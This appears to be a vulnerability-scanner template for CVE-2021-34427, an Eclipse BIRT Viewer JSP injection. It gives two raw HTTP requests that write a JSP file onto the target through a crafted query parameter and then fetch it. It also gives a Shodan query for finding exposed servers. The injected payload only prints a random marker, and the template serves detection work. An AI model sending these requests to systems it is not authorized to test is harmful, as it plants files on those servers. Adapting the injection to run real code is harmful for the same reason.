漏洞描述
Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.
id: CVE-2021-34427
info:
name: Eclipse BIRT Viewer - Remote Code Execution
author: us3r777,Synacktiv
severity: critical
description: |
Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.
reference:
- https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142
- https://sec-consult.com/vulnerability-lab/advisory/remote-code-execution-bypass-eclipse-business-intelligence-reporting-birt/
- https://nvd.nist.gov/vuln/detail/CVE-2021-34427
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-34427
epss-score: 0.56777
epss-percentile: 0.98053
cwe-id: CWE-434
cpe: cpe:2.3:a:eclipse:business_intelligence_and_reporting_tools:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: vendor
product: business_intelligence_and_reporting_tools
shodan-query: 'http.title:"eclipse birt home"'
tags: cve,cve2021,birt,rce,file-upload,intrusive,vuln
variables:
filename: "{{rand_base(20)}}"
fingerprint: "{{rand_base(20)}}"
payload: "<%out.println(\"{{fingerprint}}\");%>"
flow: http(1) && http(2)
http:
- raw:
- |
GET /document?__report=test.rptdesign&sample={{url_encode(payload)}}&__document=./test/{{filename}}.jsp/. HTTP/1.1
Host: {{Hostname}}
- |
GET /test/{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body_1, "The report document file has been generated successfully.")'
- 'contains(body_2, "{{fingerprint}}")'
- 'contains(header_2, "text/html")'
condition: and
# digest: 490a0046304402204f71c65f98cd343d7c202927a35b92a058233c4bdbc62673da9197f6f907c5ac0220699645d3bc7b1952c7f198795dca6cd08c9a94cd9f463ba6c92516cd68de8679:922c64590222798bb761d5b6d8e72950